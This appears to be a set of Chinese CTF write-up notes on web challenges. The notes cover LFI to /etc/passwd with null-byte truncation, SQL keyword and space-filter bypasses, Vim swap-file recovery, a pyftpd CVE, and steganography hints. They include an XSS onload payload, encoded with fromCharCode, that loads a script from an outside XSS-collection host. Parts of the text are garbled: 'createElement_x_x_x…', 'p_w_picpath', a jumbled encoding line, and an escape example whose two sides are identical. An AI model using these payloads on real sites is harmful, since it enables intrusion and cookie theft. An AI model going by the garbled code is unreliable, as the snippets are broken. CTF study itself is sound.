Writeups
Google hacking x-forwarder-for不行,换另一个Client_ip
.htaccess 不要忘记
Vim编辑文件时产生,它是隐藏文件,原名是data,swp名就是.data.swp。新建个data,vim -r data就可恢复
base64的编码/9j/4AAQSkZJRgABAQEAYABgAAD,这样子的,看这个格式是一张base64编码过的图片,邮件中传输图像常常使用这种方式。
img src=”data:p_w_picpath/jpg;base64, /9j/4AAQSkZJRgABAQEAYABgAAD/….” />这样子保存成html就可以解开了。
直接include了进来,可以使用../进行跨目录的一些操作,包含到/etc/passwd等敏感的文件,在GPC关闭时可以使用进行截断,造成LFI漏洞。如果GPC开启时,就会对进行转义。
onload=document.body.a(createElement_x_x_x_x_x_x_x_x_x(/script/.source)).src=String.fromCharCode(47,47,108,47,51,67,57,101,101,52,63,49,51,57,56,50,52,56,52,48,48);//
使用了fromCharCode编码 //xss.sinaapp.com/3C9ee4?1398248400
jsfuck brainfuck packed (pp|rr|jj|aa)encode
(#!/usr/bin/perl -w length q defined and| #!/usr/bin/env ruby $,^$$&&@_ | $=~[];$={___:++$,$$$$:(! | ω= /`m′) ~┻━┻ //*′`*)
secure标志是指定cookie要在https的传输协议中才会给带上的,现在的访问的是正常的http的协议,所以cookie不会被设置上,那么肯定是顺手就在发包中加上了这个cookie,试试看。也没有什么反应。
最后是在想display用怎么用的时候,是一个name=value的形式,然后想到了那个actf上的 way = “H4ck_F0r_Fun!GoGoGo!,是不是也要来试试看。然后就用get方式提交 ?display= 5842b0a0df2d52533c241c6ec26089a8作为参数。这个时候有了不一样的回显。
FTP 有主\被动两种模式,开端口情况不同。
得知2121端口正是pyftpd监听的FTP服务端口。上网搜索pyftpd历史漏洞,找到http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073,
可知union select 空格,都被过滤掉了
union 和select 用uniunionon 和selselectect来绕过
空格可以用%09 %0A %0B %0C %0D来代替,测试发现%0B是可以绕过的
JPG 格式会有压缩,所以不大可能基于像数的隐写,jpg的结尾符0XFFD9来确定
有一种绕过xss过滤的方法是html转义,(&#形式编码)
<script>alert(1)</script> ---><script>alert(1)</script>